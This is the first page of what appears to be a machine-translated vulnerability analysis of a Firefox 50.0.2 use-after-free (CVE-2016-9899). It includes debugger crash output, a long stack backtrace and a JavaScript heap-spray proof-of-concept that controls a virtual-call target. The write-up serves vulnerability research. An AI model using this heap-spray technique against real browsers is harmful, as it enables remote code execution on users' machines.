Firefox 50.0.2 after the release reuse vulnerability analysis CVE-2016-9899-a vulnerability warning-the black bar safety net

ID MYHACK58:62201783195
Type myhack58
Reporter 佚名
Modified 2017-01-27T00:00:00


Author: k0shl reprint please indicate the source author blog:http://whereisk0shl. top


Small year has passed, New Year rhythm, give you worship a early years, a Happy New Year!

Haven't come across such after the release reuse vulnerability, which vulnerability causes is a very classic Genesis, because after the release will have a wild pointer, but no pointer to the reference counting process, causing the re-application memory of the wild pointer is a placeholder, the occupancy of dangling pointers as the virtual function pointer is referenced to, thereby resulting in code execution.

In our analysis after the release of the reuse process, often used gflags /I +hpa turned on page heap monitors, and then use! heap-p-a addr observe the pointer of the application release process, but can also be by loading the symbol table, to observe the function call to pass the type of the parameter, but in this time of debugging, I turned on gflags, but can't positioning to the target pointer object, the application release process, loading the symbol table after also observed this function is passed the type of the parameter, then we can use the stack backtrace to be analyzed, this is also a tips.

This tips relatively! the heap method is slightly trouble some, but the major browsers in various logic processing of the process, more than once will be called to the kb stack traceback process of the function call, so in this process, we need for trigger the vulnerability of this symbol path is constant for breakpoint adjustments, once we analyze one execution path, we can infer the function is passed the type of the parameter, and we need to keep track of the important function call, if the function is called multiple times, we can use a conditional breakpoint to the analysis of the entire release after the reuse process.

Vulnerability reproduction

At the end of the article, I provide a I modified half of the exp, the exp difference between a shellcode and a rop gadget, the main is a heap spray after you need a rop gadget to the esp stack frame address is modified to heap rop address, so as to smooth implementation of the rop, in fact, with mona you can complete the search, after the rop chain followed by the shellcode.

First, the poc can be directly on the virus db on access to, and the poc address:

We can get directly to the firefox symbol table server, use windbg to load, srv*

Then open the PoC, Firefox crashes.

(7f8. b0): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=1637d800 ebx=00000000 ecx=0012dea8 edx=4543484f esi=0012dec4 edi=14e8dee0

eip=0292c44c esp=0012de98 ebp=0012deac iopl=0 nv up ei pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

xul! nsCOMPtr<nsIContent>::nsCOMPtr<nsIContent>+0x1d:

0292c44c ff12 call dword ptr [edx] ds:0023:4543484f=????????

This crash location is illmatic, is a call [edx], looks like a virtual function call, and 4543484f this address is what we in the PoC in one location.

for(var i=0;i<4096;i++) { //replace pl[i]=new Uint8Array(1000); pl[i][0] = 0x4F; pl[i][1] = 0x48; pl[i][2] = 0x43; pl[i][3] = 0x45; //eip for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; // pl[i] = document. createElement('media'); //the document. body. appendChild(pl[i]); }

In the PoC, we apply a large number of 4096 array, each array size is 1000, the first 4 bytes it is a call[edx]call edx values, which means that we may be able to exploit this vulnerability RCE, the next we're through! the heap method, can't see the goal in the end is how one application release process, by kb can be traced back to the stack call.

0:000> kb

ChildEBP RetAddr Args to Child

0012deac 0173df89 0feccc00 0012decc 0012dee8 xul! nsCOMPtr<nsIContent>::nsCOMPtr<nsIContent>+0x1d [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\nscomptr.h @ 504]

0012debc 012dfa21 00000000 00000000 0e9786c0 xul! nsPluginFrame::BeginSwapDocShells+0xf [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nspluginframe.cpp @ 1796]

0012dee8 0137f404 0173df7a 00000000 125fd1c0 xul! nsIDocument::EnumerateActivityObservers+0x33 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsdocument.cpp @ 10246]

0012df04 0137f3a6 12781800 00000000 140c2058 xul! BeginSwapDocShellsForDocument+0x42 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nssubdocumentframe.cpp @ 1100]

0012df1c 0137f2ab 140c1d90 140c21a8 140c2058 xul! BeginSwapDocShellsForViews+0x1e [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nssubdocumentframe.cpp @ 1112]

0012df34 011b3ef5 140c2058 140c2058 140c1d40 xul! nsSubDocumentFrame::DestroyFrom+0x36 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nssubdocumentframe.cpp @ 999]

0012df78 016897ff 140c2058 00000002 140c1d40 xul! nsBlockFrame::DoRemoveFrame+0x108 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nsblockframe.cpp @ 5797]

0012df90 011dd9f4 00000001 140c2058 134dd080 xul! nsBlockFrame::RemoveFrame+0x27 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nsblockframe.cpp @ 5162]

0012dfb0 011dd811 00000001 140c2058 0c4969b0 xul! nsFrameManager::RemoveFrame+0x3c [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\base\nsframemanager.cpp @ 513]0012e00c 011df01b 10ef4420 134dd080 113f5940 xul! nsCSSFrameConstructor::ContentRemoved+0x1b0 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\base\nscssframeconstructor.cpp @ 8414]

0012e058 011e0e78 11145800 113f5940 134dd000 xul! PresShell::ContentRemoved+0xc0 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\base\nspresshell.cpp @ 4432]

0012e094 011e17de 00000001 113f5900 10ef4454 xul! nsNodeUtils::ContentRemoved+0xd5 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsnodeutils.cpp @ 226]

0012e0b8 011e1774 00000001 00000001 134dd080 xul! nsINode::doRemoveChildAt+0x5a [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsinode.cpp @ 1906]

0012e0dc 016e2401 00000001 00000001 00000000 xul! mozilla::dom::FragmentOrElement::RemoveChildAt+0x35 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\fragmentorelement.cpp @ 1162]

0012e0f4 016e23b9 0132dd44 0a34b000 0012e144 xul! nsINode::Remove+0x34 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsinode.cpp @ 1828]

0012e0f8 0132dd44 0a34b000 0012e144 134dd080 xul! mozilla::dom::ElementBinding::remove+0x9 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dom\bindings\documenttypebinding.cpp @ 302]

0012e1c4 0132d81a 00000000 0012e358 0000003a xul! js::InternalCallOrConstruct+0x4d4 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 453]

0012e1e8 011fc510 0ece2868 0c710705 0012e2e8 xul! InternalCall+0x9a [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 498]

0012e3a8 012fbb08 0c71055f 00000001 0c4b8060 xul! js::jit::DoCallFallback+0x3f0 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\baselineic.cpp @ 5979]

0012e4c0 0138817a 0a34b000 0c4b80c0 0012ee38 xul! EnterBaseline+0x288 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\baselinejit.cpp @ 158]

0012e59c 013a496b 0c498c97 0a34b000 1657ed30 xul! js::jit::EnterBaselineAtBranch+0x2ab [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\baselinejit.cpp @ 262]

0012ee38 0185bfdd 0012eef8 0012eef8 0012eef8 xul! Interpret+0x89bb [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 1877]

0012eec8 01223230 0a34b000 0012eee8 14a52060 xul! js::RunScript+0x21d [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 399]

0012ef28 013507bb 0012f004 0012ef58 00000000 xul! js::ExecuteKernel+0x64 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 682]

0012ef70 013504c6 0012f004 00000000 0012f0d8 xul! js::Execute+0x76 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 711]

0012f038 01659c6b 0012f060 0012f06c 0012f14c xul! Evaluate+0xaa [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jsapi.cpp @ 4436]

0012f074 01186b50 0012f258 0012f14c 0012f188 xul! Evaluate+0x66 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jsapi.cpp @ 4463]

0012f11c 011862c5 0012f240 0012f258 0012f198 xul! nsJSUtils::EvaluateString+0x242 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base

[1] [2] [3] [4] next